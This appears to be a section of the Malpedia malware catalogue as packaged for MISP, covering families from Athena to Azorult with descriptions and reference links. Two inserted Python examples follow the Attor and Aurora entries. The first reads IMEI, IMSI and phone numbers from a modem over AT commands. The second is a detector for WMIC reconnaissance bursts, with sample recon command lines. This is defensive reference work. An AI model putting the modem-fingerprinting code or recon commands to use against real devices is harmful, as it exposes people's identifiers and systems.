https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

https://blog.morphisec.com/syk-crypter-discord

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/

https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service

https://eln0ty.github.io/malware%20analysis/asyncRAT/

https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/

https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2022/wochenrueckblick_7.html

https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader

https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/

https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages

https://embee-research.ghost.io/unpacking-malware-using-process-hacker-and-memory-inspection/

https://www.zscaler.com/blogs/security-research/targeted-attack-thailand-pass-customers-delivers-asyncrat

https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers

https://www.linkedin.com/feed/update/urn:li:activity:7137086303329783808/

https://assets.virustotal.com/reports/2021trends.pdf

https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns

https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/

https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html

https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt

https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/

https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/follina-msdt-exploit-malware

https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

https://aidenmitchell.ca/asyncrat-via-vbs/

https://redskyalliance.org/xindustry/possible-identity-of-a-kuwaiti-hacker-nyanxcat

https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html

https://www.esentire.com/blog/suspected-asyncrat-delivered-via-iso-files-using-html-smuggling-technique

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper

https://cocomelonc.github.io/book/2023/12/13/malwild-book.html

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/

https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise

https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html

https://www.esentire.com/blog/asyncrat-activity

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://embee-research.ghost.io/unpacking-net-malware-with-process-hacker/

https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w

https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html

https://blogs.vmware.com/security/2019/11/threat-analysis-unit-tau-threat-intelligence-notification-asyncrat.html

https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/

https://blog.qualys.com/vulnerabilities-threat-research/2022/08/16/asyncrat-c2-framework-overview-technical-analysis-and-detection

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://github.com/jeFF0Falltrades/Tutorials/tree/master/asyncrat_config_parser

https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

https://securelist.com/apt-trends-report-q3-2020/99204/

https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html

https://twitter.com/ESETresearch/status/1449132020613922828

Athena

Part of the Mythic framework. The agent is written in C# (.NET 6) and supports HTTP, WebSockets, Slack and SMB as C2 channels.

The tag is: misp-galaxy:malpedia="Athena"

Athena is also known as:

Table 2922. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.athena

https://cyble.com/blog/threat-actor-deploys-mythics-athena-agent-to-target-russian-semiconductor-suppliers/

AthenaGo RAT

The tag is: misp-galaxy:malpedia="AthenaGo RAT"

AthenaGo RAT is also known as:

Table 2923. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago

ATI-Agent

The tag is: misp-galaxy:malpedia="ATI-Agent"

ATI-Agent is also known as:

Table 2924. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

ATMii

The tag is: misp-galaxy:malpedia="ATMii"

ATMii is also known as:

Table 2926. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii

https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/

ATMSpitter

The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll. Both are legitimate, vendor-supplied Windows libraries used to interact with the components of different ATM models.

The tag is: misp-galaxy:malpedia="ATMSpitter"

ATMSpitter is also known as:

Table 2929. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter

https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf

https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf

https://www.secureworks.com/research/threat-profiles/gold-kingswood

http://www.secureworks.com/research/threat-profiles/gold-kingswood

Attor

Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.

Attor’s core lies in its dispatcher, which serves as a management unit for additional plugins that provide all of the malware’s key capabilities. This allows the attackers to customize the platform on a per-victim basis. The plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability.

The most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, potentially identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing the victim’s screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.
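
The AT-command fingerprinting described above, as an added example that is not Attor’s code and is not taken from the ESET report: it issues the standard 3GPP TS 27.007 identity queries (AT+CGSN, AT+CIMI, AT+CNUM; an assumption, since the page does not say which commands the plugin sends) against a constructed modem transcript, parses the V.250-style replies, and validates the IMEI’s Luhn check digit, which is the sanity check an analyst wants before treating a recovered identifier as genuine. `fake_send` stands in for a serial port; a real deployment would wrap a pyserial write/read in the same signature.

```python
import re
from typing import Callable, Dict, List, Optional

# Standard 3GPP TS 27.007 identity queries. The page says only that Attor
# uses "the AT command set" to read IMEI/IMSI/MSISDN; which commands it
# actually sends is not stated, so this mapping is an assumption.
AT_QUERIES = {
    "IMEI": "AT+CGSN",    # product serial number (the IMEI on GSM modems)
    "IMSI": "AT+CIMI",    # subscriber identity read from the SIM
    "MSISDN": "AT+CNUM",  # subscriber number(s), if provisioned on the SIM
}

# +CNUM: "<alpha>","<number>",<type>
_CNUM_RE = re.compile(r'\+CNUM:\s*"[^"]*"\s*,\s*"([^"]*)"\s*,\s*(\d+)')

# Constructed modem transcript (not captured from a real device): the raw
# byte stream a V.250-style modem returns for each command, echo (ATE) off.
CONSTRUCTED_REPLIES = {
    "AT+CGSN": b"\r\n490154203237518\r\n\r\nOK\r\n",
    "AT+CIMI": b"\r\n270011234567890\r\n\r\nOK\r\n",
    "AT+CNUM": b'\r\n+CNUM: "","+352691234567",145\r\n\r\nOK\r\n',
}


def fake_send(command: str) -> bytes:
    """Stand-in for a serial write/read; unknown commands get ERROR."""
    return CONSTRUCTED_REPLIES.get(command, b"\r\nERROR\r\n")


def parse_reply(raw: bytes) -> Optional[List[str]]:
    """Split a V.250 reply into payload lines; None unless the final result code is OK."""
    lines = [ln.strip() for ln in raw.decode("ascii", errors="replace").split("\r\n")]
    lines = [ln for ln in lines if ln]
    if not lines or lines[-1] != "OK":
        return None  # "ERROR", "+CME ERROR: ..." or a truncated read
    return lines[:-1]


def luhn_valid(imei: str) -> bool:
    """The 15th IMEI digit is a Luhn check digit over the first 14."""
    if not (len(imei) == 15 and imei.isdigit()):
        return False
    total = 0
    for i, ch in enumerate(reversed(imei)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def fingerprint_modem(send: Callable[[str], bytes]) -> Dict[str, Optional[str]]:
    """Query the three identifiers through `send` and normalise the answers."""
    result: Dict[str, Optional[str]] = {}
    for name, cmd in AT_QUERIES.items():
        payload = parse_reply(send(cmd))
        if not payload:
            result[name] = None
            continue
        if name == "MSISDN":
            m = _CNUM_RE.search(payload[0])
            result[name] = m.group(1) if m else None
        else:
            result[name] = payload[0]
    return result


if __name__ == "__main__":
    ids = fingerprint_modem(fake_send)
    print(ids, "IMEI checksum ok:", luhn_valid(ids["IMEI"] or ""))
```

A modem that rejects a query (no SIM, PIN locked, unsupported command) answers with ERROR or +CME ERROR, which `parse_reply` maps to None rather than a bogus identifier; the Luhn check catches truncated or mistyped IMEIs that would otherwise be indexed as real hardware.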

The tag is: misp-galaxy:malpedia="Attor"

Attor is also known as:

Table 2931. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.attor

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf

https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html

https://www.zdnet.com/article/new-espionage-malware-found-targeting-russian-speaking-users-in-eastern-europe/

https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html

https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform

https://safe.cnews.ru/news/top/2019-10-11_za_rossijskimi_diplomatami

https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform/

https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html

https://threatpost.com/sophisticated-spy-kit-russians-gsm-plugin/149095/

AuKill

According to Sophos, AuKill abuses an outdated version of the driver shipped with version 16.32 of the Microsoft Sysinternals utility Process Explorer (a bring-your-own-vulnerable-driver technique) to disable EDR processes before deploying either a backdoor or ransomware on the target system.

The tag is: misp-galaxy:malpedia="AuKill"

AuKill is also known as:

  • SophosKill

Table 2933. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aukill

https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/

Aurora Stealer

First advertised as a Malware-as-a-Service (MaaS) on Russian-speaking underground forums in April 2022, Aurora Stealer is a Golang-based information stealer with downloading and remote access capabilities. The malware targets data from multiple browsers, cryptocurrency wallets and the local system, and can also act as a loader. During execution it runs several commands through WMIC to collect basic host information, captures a screenshot, and exfiltrates everything to the C2 server as a single base64-encoded JSON file.
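
The WMIC reconnaissance burst described above is the most detectable part of the chain, because a freshly dropped binary spawning several distinct `wmic.exe` queries within seconds is rare on workstations. The detection below is an added example, not Aurora’s code and not a vendor rule from the references: it groups process-creation events by parent and alerts when one parent launches three or more distinct WMIC queries inside a 60-second window. The log lines are constructed in a simplified Sysmon Event ID 1 shape, and the specific queries are illustrative, since the page does not list which ones Aurora runs.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Tuning: three or more distinct WMIC queries from one parent inside a minute.
WMIC_BURST_MIN_QUERIES = 3
WMIC_BURST_WINDOW = timedelta(seconds=60)

# Constructed process-creation records (not real telemetry). The query list is
# illustrative: the page only says Aurora runs "several commands through WMIC".
_PARENT = "C:\\Users\\u\\AppData\\Local\\Temp\\Update.exe"
_WMIC = "C:\\Windows\\System32\\wbem\\WMIC.exe"
_RAW_EVENTS = [
    {"ts": "2023-01-10T09:00:01", "pid": 4120, "ppid": 3988, "parent_image": _PARENT,
     "image": _WMIC, "cmdline": "wmic os get Caption,Version"},
    {"ts": "2023-01-10T09:00:02", "pid": 4124, "ppid": 3988, "parent_image": _PARENT,
     "image": _WMIC, "cmdline": "wmic cpu get Name"},
    {"ts": "2023-01-10T09:00:02", "pid": 4130, "ppid": 3988, "parent_image": _PARENT,
     "image": _WMIC, "cmdline": "wmic baseboard get Product"},
    {"ts": "2023-01-10T09:00:03", "pid": 4136, "ppid": 3988, "parent_image": _PARENT,
     "image": _WMIC, "cmdline": "wmic path win32_VideoController get Name"},
    # same query again, via the full quoted path: must count once, not twice
    {"ts": "2023-01-10T09:00:04", "pid": 4140, "ppid": 3988, "parent_image": _PARENT,
     "image": _WMIC, "cmdline": '"' + _WMIC + '" os get Caption,Version'},
    # non-WMIC child of the same parent: ignored
    {"ts": "2023-01-10T09:00:05", "pid": 4144, "ppid": 3988, "parent_image": _PARENT,
     "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd /c whoami"},
    # benign: one query from an interactive shell
    {"ts": "2023-01-10T09:05:00", "pid": 5200, "ppid": 1500,
     "parent_image": "C:\\Windows\\System32\\cmd.exe", "image": _WMIC, "cmdline": "wmic qfe list"},
]
CONSTRUCTED_LOG = [json.dumps(e) for e in _RAW_EVENTS]


def is_wmic(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] == "wmic.exe"


def normalise_wmic(cmdline: str) -> str:
    """Drop the binary token (bare 'wmic' or a quoted path), lower-case, squeeze spaces."""
    parts = cmdline.replace('"', "").lower().split()
    if parts and (parts[0] == "wmic" or parts[0].endswith("wmic.exe")):
        parts = parts[1:]
    return " ".join(parts)


def detect_wmic_recon(log_lines: List[str]) -> List[dict]:
    """One alert per parent process that bursts distinct WMIC queries within the window."""
    by_parent: Dict[Tuple[int, str], List[Tuple[datetime, str]]] = defaultdict(list)
    for line in log_lines:
        ev = json.loads(line)
        if not is_wmic(ev["image"]):
            continue
        by_parent[(ev["ppid"], ev["parent_image"])].append(
            (datetime.fromisoformat(ev["ts"]), normalise_wmic(ev["cmdline"])))
    alerts = []
    for (ppid, parent_image), spawns in by_parent.items():
        spawns.sort()
        for i, (t0, _) in enumerate(spawns):
            window = {q for t, q in spawns[i:] if t - t0 <= WMIC_BURST_WINDOW}
            if len(window) >= WMIC_BURST_MIN_QUERIES:
                alerts.append({"ppid": ppid, "parent_image": parent_image,
                               "first_seen": t0.isoformat(), "queries": sorted(window)})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_wmic_recon(CONSTRUCTED_LOG):
        print(json.dumps(alert, indent=2))
```

Counting distinct normalised queries rather than raw spawns keeps a retried command from inflating the score, and keying on the parent rather than on `wmic.exe` itself is what separates a stealer’s recon burst from an administrator’s single `wmic qfe list`. In production, add the parent’s signing status or path (user-writable directories such as %TEMP%) as a second condition to cut noise from inventory agents.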

The tag is: misp-galaxy:malpedia="Aurora Stealer"

Aurora Stealer is also known as:

Table 2936. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora_stealer

https://blog.sekoia.io/bluefox-information-stealer-traffer-maas/

https://d01a.github.io/aurora-stealer/

https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-aurora-stealer

https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219

https://d01a.github.io/aurora-stealer-builder/

https://research.loginsoft.com/threat-research/aurora-the-dark-dawn-and-its-menacing-effects/

https://research.openanalysis.net/in2al5dp3in4er/loader/analysis/sandbox/invalid%20printer/2023/04/23/in2al5dp3in4er.html

https://isc.sans.edu/diary/rss/29448

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

Avaddon

Avaddon is ransomware targeting Windows systems, often spread via malicious spam. The first known attack distributing Avaddon was in February 2020. Avaddon appends the extension .avdn to encrypted files and uses a Tor payment site for the ransom payment.

The tag is: misp-galaxy:malpedia="Avaddon"

Avaddon is also known as:

Table 2937. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://twitter.com/dk_samper/status/1348560784285167617

https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.connectwise.com/resources/avaddon-profile

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf

https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/

https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/

https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1

https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/

https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/

https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.swascan.com/it/avaddon-ransomware/

https://arxiv.org/pdf/2102.04796.pdf

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://atos.net/en/lp/securitydive/avaddon-ransomware-analysis

https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/

https://www.mandiant.com/resources/chasing-avaddon-ransomware

https://twitter.com/Securityinbits/status/1271065316903120902

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://www.tgsoft.it/files/report/download.asp?id=568531345

AvastDisabler

The tag is: misp-galaxy:malpedia="AvastDisabler"

AvastDisabler is also known as:

Table 2938. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler

https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/

AVCrypt

BleepingComputer reported the discovery of AVCrypt, a malware that tries to uninstall existing security software before it encrypts a computer. Furthermore, as it removes numerous services, including Windows Update, and provides no contact information, this ransomware may actually be a wiper.

The tag is: misp-galaxy:malpedia="AVCrypt"

AVCrypt is also known as:

Table 2939. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt

https://twitter.com/malwrhunterteam/status/976925447043846145

https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/

AvD Crypto Stealer

Cyble Research discovered this .NET malware, dubbed "AvD Crypto Stealer". The name is misleading, because it is a clipper (it swaps cryptocurrency wallet addresses in the clipboard). Cyble assumes that one scenario is the malware being aimed at other threat actors.

The tag is: misp-galaxy:malpedia="AvD Crypto Stealer"

AvD Crypto Stealer is also known as:

Table 2940. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.avd

https://blog.cyble.com/2022/03/22/hunters-become-the-hunted/

Ave Maria

Information stealer and RAT that is typically wrapped in an AutoIt script.

The tag is: misp-galaxy:malpedia="Ave Maria"

Ave Maria is also known as:

  • AVE_MARIA

  • AveMariaRAT

  • Warzone RAT

  • WarzoneRAT

  • avemaria

Table 2942. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware

https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat

https://blogs.blackberry.com/en/2021/12/threat-thursday-warzone-rat-breeds-a-litter-of-scriptkiddies

https://blog.yoroi.company/research/the-ave_maria-malware/

https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4

https://www.youtube.com/watch?v=-G82xh9m4hc

https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html

https://www.youtube.com/watch?v=81fdvmGmRvM

https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/

https://www.huntress.com/blog/ave-maria-and-the-chambers-of-warzone-rat

https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/

https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://www.youtube.com/watch?v=T0tdj1WDioM

https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf

https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest

https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf

https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA

https://exploitreversing.files.wordpress.com/2022/11/mas_6-1.pdf

https://blog.morphisec.com/syk-crypter-discord

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://blog.talosintelligence.com/attributing-yorotrooper/

https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://reaqta.com/2019/04/ave_maria-malware-part1/

https://muha2xmad.github.io/malware-analysis/warzonerat/

https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/

https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://kienmanowar.wordpress.com/2023/03/25/quicknote-decrypting-the-c2-configuration-of-warzone-rat/

https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html

https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/warzonerat/warzonerat_config_extraction.ipynb

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://asec.ahnlab.com/en/36629/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique

https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/

https://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a

https://securelist.com/apt-trends-report-q3-2020/99204/

https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html

http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery

https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html

AvosLocker

AvosLocker is a ransomware-as-a-service (RaaS) gang that first appeared in mid-2021. It has since become notorious for its attacks targeting critical infrastructure in the United States, including the sectors of financial services, critical manufacturing, and government facilities.

In March 2022, the FBI and US Treasury Department issued a warning about the attacks.

The tag is: misp-galaxy:malpedia="AvosLocker"

AvosLocker is also known as:

Table 2943. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker

https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html

https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/

https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html

https://www.ic3.gov/Media/News/2022/220318.pdf

https://cdn.pathfactory.com/assets/10555/contents/400686/13f4424c-05b4-46db-bb9c-6bf9b5436ec4.pdf

https://news.sophos.com/en-us/2021/12/22/avos-locker-remotely-accesses-boxes-even-running-in-safe-mode/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://unit42.paloaltonetworks.com/emerging-ransomware-groups/

https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux

Unidentified 061 (Windows)

Was previously wrongly tagged as PoweliksDropper, now looking for additional context.

The tag is: misp-galaxy:malpedia="Unidentified 061 (Windows)"

Unidentified 061 (Windows) is also known as:

Table 2944. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.avrecon

Ayegent

The tag is: misp-galaxy:malpedia="Ayegent"

Ayegent is also known as:

Table 2947. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent

Aytoke

Keylogger.

The tag is: misp-galaxy:malpedia="Aytoke"

Aytoke is also known as:

Table 2948. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aytoke

https://snort.org/rule_docs/1-34217

https://www.youtube.com/watch?v=FttiysUZmDw

Azorult

AZORult is a credential and payment-card information stealer. Among other things, version 2 added support for .bit (Namecoin) domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.

The tag is: misp-galaxy:malpedia="Azorult"

Azorult is also known as:

  • PuffStealer

  • Rultazo

Table 2949. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

https://twitter.com/DrStache_/status/1227662001247268864

https://securelist.com/azorult-analysis-history/89922/

https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html

https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign

